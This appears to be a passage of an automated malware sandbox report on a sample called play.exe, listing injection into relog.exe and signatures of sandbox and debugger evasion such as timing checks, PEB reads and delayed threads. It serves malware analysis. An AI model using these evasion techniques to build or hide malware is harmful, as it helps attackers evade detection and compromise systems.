Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0396A836 pushfd ; retf	4_2_0396A87F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_039786FF push ebp; retn A5BAh	4_2_039787E5
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03968623 push B2A749EEh; iretd	4_2_0396862A
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03977D81 push eax; ret	4_2_03977D82

Source: play.exe

Static PE information: section name: .text entropy: 7.973595489277393

Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_026D096E rdtsc

0_2_026D096E

Source: C:\Windows\SysWOW64\relog.exe	Window / User API: threadDelayed 3936			Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Window / User API: threadDelayed 6035			Jump to behavior

Source: C:\Users\user\Desktop\play.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\relog.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\relog.exe TID: 7764	Thread sleep count: 3936 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 7764	Thread sleep time: -7872000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 7764	Thread sleep count: 6035 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 7764	Thread sleep time: -12070000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep time: -38000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\relog.exe

Code function: 5_2_008CC700 FindFirstFileW,FindNextFileW,FindClose,

5_2_008CC700

Source: relog.exe, 00000005.00000002.4103860914.0000000002C71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|'[Q7
Source: aAqvujXSGNo.exe, 00000006.00000002.4104075019.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: firefox.exe, 00000007.00000002.2356033247.000001917377C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\play.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\play.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_026D096E rdtsc

0_2_026D096E

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_00BB8373 LdrLoadDll,

0_2_00BB8373

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_00BE70C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00BE70C8

Source: C:\Users\user\Desktop\play.exe

0_2_00BE90CB

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268826B mov eax, dword ptr fs:[00000030h]	0_2_0268826B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694260 mov eax, dword ptr fs:[00000030h]	0_2_02694260
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694260 mov eax, dword ptr fs:[00000030h]	0_2_02694260
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694260 mov eax, dword ptr fs:[00000030h]	0_2_02694260
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274A250 mov eax, dword ptr fs:[00000030h]	0_2_0274A250
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274A250 mov eax, dword ptr fs:[00000030h]	0_2_0274A250
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0276625D mov eax, dword ptr fs:[00000030h]	0_2_0276625D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696259 mov eax, dword ptr fs:[00000030h]	0_2_02696259
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02718243 mov eax, dword ptr fs:[00000030h]	0_2_02718243
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02718243 mov ecx, dword ptr fs:[00000030h]	0_2_02718243
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A250 mov eax, dword ptr fs:[00000030h]	0_2_0268A250
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268823B mov eax, dword ptr fs:[00000030h]	0_2_0268823B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02E1 mov eax, dword ptr fs:[00000030h]	0_2_026A02E1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02E1 mov eax, dword ptr fs:[00000030h]	0_2_026A02E1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02E1 mov eax, dword ptr fs:[00000030h]	0_2_026A02E1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027662D6 mov eax, dword ptr fs:[00000030h]	0_2_027662D6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02A0 mov eax, dword ptr fs:[00000030h]	0_2_026A02A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02A0 mov eax, dword ptr fs:[00000030h]	0_2_026A02A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov ecx, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE284 mov eax, dword ptr fs:[00000030h]	0_2_026CE284
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE284 mov eax, dword ptr fs:[00000030h]	0_2_026CE284
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02710283 mov eax, dword ptr fs:[00000030h]	0_2_02710283
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02710283 mov eax, dword ptr fs:[00000030h]	0_2_02710283
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02710283 mov eax, dword ptr fs:[00000030h]	0_2_02710283
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273437C mov eax, dword ptr fs:[00000030h]	0_2_0273437C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02738350 mov ecx, dword ptr fs:[00000030h]	0_2_02738350
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275A352 mov eax, dword ptr fs:[00000030h]	0_2_0275A352
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov ecx, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0276634F mov eax, dword ptr fs:[00000030h]	0_2_0276634F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02768324 mov eax, dword ptr fs:[00000030h]	0_2_02768324
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02768324 mov ecx, dword ptr fs:[00000030h]	0_2_02768324
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02768324 mov eax, dword ptr fs:[00000030h]	0_2_02768324
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02768324 mov eax, dword ptr fs:[00000030h]	0_2_02768324
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA30B mov eax, dword ptr fs:[00000030h]	0_2_026CA30B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA30B mov eax, dword ptr fs:[00000030h]	0_2_026CA30B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA30B mov eax, dword ptr fs:[00000030h]	0_2_026CA30B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C310 mov ecx, dword ptr fs:[00000030h]	0_2_0268C310
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B0310 mov ecx, dword ptr fs:[00000030h]	0_2_026B0310
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C63FF mov eax, dword ptr fs:[00000030h]	0_2_026C63FF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE3F0 mov eax, dword ptr fs:[00000030h]	0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE3F0 mov eax, dword ptr fs:[00000030h]	0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE3F0 mov eax, dword ptr fs:[00000030h]	0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027343D4 mov eax, dword ptr fs:[00000030h]	0_2_027343D4
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027343D4 mov eax, dword ptr fs:[00000030h]	0_2_027343D4
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E3DB mov eax, dword ptr fs:[00000030h]	0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E3DB mov eax, dword ptr fs:[00000030h]	0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E3DB mov ecx, dword ptr fs:[00000030h]	0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E3DB mov eax, dword ptr fs:[00000030h]	0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h]	0_2_026983C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h]	0_2_026983C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h]	0_2_026983C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h]	0_2_026983C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027163C0 mov eax, dword ptr fs:[00000030h]	0_2_027163C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274C3CD mov eax, dword ptr fs:[00000030h]	0_2_0274C3CD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E388 mov eax, dword ptr fs:[00000030h]	0_2_0268E388
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E388 mov eax, dword ptr fs:[00000030h]	0_2_0268E388
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E388 mov eax, dword ptr fs:[00000030h]	0_2_0268E388
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B438F mov eax, dword ptr fs:[00000030h]	0_2_026B438F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B438F mov eax, dword ptr fs:[00000030h]	0_2_026B438F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02688397 mov eax, dword ptr fs:[00000030h]	0_2_02688397
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BC073 mov eax, dword ptr fs:[00000030h]	0_2_026BC073
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716050 mov eax, dword ptr fs:[00000030h]	0_2_02716050
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02692050 mov eax, dword ptr fs:[00000030h]	0_2_02692050
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726030 mov eax, dword ptr fs:[00000030h]	0_2_02726030
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A020 mov eax, dword ptr fs:[00000030h]	0_2_0268A020
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C020 mov eax, dword ptr fs:[00000030h]	0_2_0268C020
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02714000 mov ecx, dword ptr fs:[00000030h]	0_2_02714000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h]	0_2_026AE016
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h]	0_2_026AE016
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h]	0_2_026AE016
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h]	0_2_026AE016
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026980E9 mov eax, dword ptr fs:[00000030h]	0_2_026980E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A0E3 mov ecx, dword ptr fs:[00000030h]	0_2_0268A0E3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027160E0 mov eax, dword ptr fs:[00000030h]	0_2_027160E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C0F0 mov eax, dword ptr fs:[00000030h]	0_2_0268C0F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D20F0 mov ecx, dword ptr fs:[00000030h]	0_2_026D20F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027120DE mov eax, dword ptr fs:[00000030h]	0_2_027120DE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026880A0 mov eax, dword ptr fs:[00000030h]	0_2_026880A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027560B8 mov eax, dword ptr fs:[00000030h]	0_2_027560B8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027560B8 mov ecx, dword ptr fs:[00000030h]	0_2_027560B8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027280A8 mov eax, dword ptr fs:[00000030h]	0_2_027280A8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269208A mov eax, dword ptr fs:[00000030h]	0_2_0269208A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764164 mov eax, dword ptr fs:[00000030h]	0_2_02764164
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764164 mov eax, dword ptr fs:[00000030h]	0_2_02764164
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02728158 mov eax, dword ptr fs:[00000030h]	0_2_02728158
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov ecx, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696154 mov eax, dword ptr fs:[00000030h]	0_2_02696154
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696154 mov eax, dword ptr fs:[00000030h]	0_2_02696154
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C156 mov eax, dword ptr fs:[00000030h]	0_2_0268C156
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C0124 mov eax, dword ptr fs:[00000030h]	0_2_026C0124
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02750115 mov eax, dword ptr fs:[00000030h]	0_2_02750115
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118 mov ecx, dword ptr fs:[00000030h]	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118 mov eax, dword ptr fs:[00000030h]	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118 mov eax, dword ptr fs:[00000030h]	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118 mov eax, dword ptr fs:[00000030h]	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027661E5 mov eax, dword ptr fs:[00000030h]	0_2_027661E5
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C01F8 mov eax, dword ptr fs:[00000030h]	0_2_026C01F8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov ecx, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027561C3 mov eax, dword ptr fs:[00000030h]	0_2_027561C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027561C3 mov eax, dword ptr fs:[00000030h]	0_2_027561C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D0185 mov eax, dword ptr fs:[00000030h]	0_2_026D0185
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h]	0_2_0271019F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h]	0_2_0271019F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h]	0_2_0271019F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h]	0_2_0271019F
